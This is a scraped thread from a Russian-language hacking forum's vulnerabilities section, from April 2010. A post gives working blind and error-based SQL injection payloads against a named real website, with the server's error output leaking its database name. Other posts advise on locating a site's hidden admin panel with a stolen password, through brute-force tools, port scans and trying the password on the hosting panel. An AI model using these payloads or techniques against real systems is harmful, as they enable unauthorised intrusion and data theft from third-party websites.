ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12811  
Старый 28.04.2010, 19:13
Аватар для DrakonHaSh
DrakonHaSh
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305

Репутация: 30
Отправить сообщение для DrakonHaSh с помощью ICQ
По умолчанию

pinch
Цитата:
http://www.looplifter.co.uk/news.asp?id=5
1. слепая sql:

http://www.looplifter.co.uk/news.asp?id=5 and '1'=(select 1)
=> так же как и при id=5

http://www.looplifter.co.uk/news.asp?id=5 and '1'=(select 2)
=> пусто

2.
http://www.looplifter.co.uk/news.asp?id=5 and 0<(select db_name())--
=>
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'Looplifter' to a column of data type int.
/news.asp, line 355
==> не такая уж и слепая

http://www.looplifter.co.uk/news.asp?id=5 and 0<(select count(*) from information_schema.columns)--
=> так же как и при id=5

http://www.looplifter.co.uk/news.asp?id=5 and 0<(select count(*) from information_schema.tables)--
=> пусто

http://www.looplifter.co.uk/news.asp?id=5 and 0<(select count(*) from information_schema.columns) and '0'<(select count(*) from information_schema.tables)--
=> пусто

http://www.looplifter.co.uk/news.asp?id=5 and 0<(select count(*) from information_schema.columns) and '0'<(select 'count(*) from information_schema.tables')--
=> так же как и при id=5

==> наврятли там какой-то уж очень интеллектуальный фильтр, может просто запрещены права юзеру Looplifter на чтение information_schema.tables ?

Последний раз редактировалось DrakonHaSh; 28.04.2010 в 20:55..
 
Ответить с цитированием

  #12812  
Старый 28.04.2010, 19:16
Аватар для pinch
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

=))) эт не какаята хрень а MSSQL 2000
 
Ответить с цитированием

  #12813  
Старый 28.04.2010, 20:58
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

народ есть ли альтернативный способ как найти админку?

уже не первый раз сталкиваюсь с такой проблемой,пароль есть- а админку не найти ..
программой делаю перебор стандартных админок типа admin,administrator,cms,admin_panel etc...
результатов нет!

есть ли другой способ ?
 
Ответить с цитированием

  #12814  
Старый 28.04.2010, 21:54
Аватар для shell_c0de
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

2Konqi
http://madnet.name/tools/madss/
или юзай прогу IntelliTamper
и еще попробуй пароль к хостеру если нету админки все таки...
+проскань порты
например панелька http://188.40.XX.XX:2222/
 
Ответить с цитированием

  #12815  
Старый 28.04.2010, 21:57
Аватар для AC//DC
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

Цитата:
Сообщение от Konqi  
народ есть ли альтернативный способ как найти админку?

уже не первый раз сталкиваюсь с такой проблемой,пароль есть- а админку не найти ..
программой делаю перебор стандартных админок типа admin,administrator,cms,admin_panel etc...
результатов нет!

есть ли другой способ ?
попробуй robots.txt может прокатит.......
 
Ответить с цитированием

  #12816  
Старый 28.04.2010, 22:08
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от AC//DC  
попробуй robots.txt может прокатит.......

нету роботов,всегда проверяю

а вообще нашел хорошую прагу IntelliTampor
 
Ответить с цитированием

  #12817  
Старый 28.04.2010, 22:10
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от shell_c0de  
2Konqi
http://madnet.name/tools/madss/
или юзай прогу IntelliTamper
и еще попробуй пароль к хостеру если нету админки все таки...
+проскань порты
например панелька http://188.40.XX.XX:2222/
спасибо,папробую

не видя твой пост сам писал про прагу

только что нашел
 
Ответить с цитированием

  #12818  
Старый 28.04.2010, 22:33
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Цитата:
Сообщение от Konqi  
народ есть ли альтернативный способ как найти админку?

уже не первый раз сталкиваюсь с такой проблемой,пароль есть- а админку не найти ..
программой делаю перебор стандартных админок типа admin,administrator,cms,admin_panel etc...
результатов нет!

есть ли другой способ ?
http://forum.xakep.ru/m_1653053/tm.htm

Последний раз редактировалось Strilo4ka; 29.04.2010 в 18:36..
 
Ответить с цитированием

  #12819  
Старый 28.04.2010, 22:40
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Strilo4ka спасибо
 
Ответить с цитированием

  #12820  
Старый 28.04.2010, 23:18
Аватар для Nek1t
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
Arrow

И еще раз возвращаясь к теме вывода данных в SQL-inj в ошибках.
Правильно понимаю, что максимум можно вывести 64 символа чистых данных(единица в конце отбрасывается), и единственный выход - резать на подстроки?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ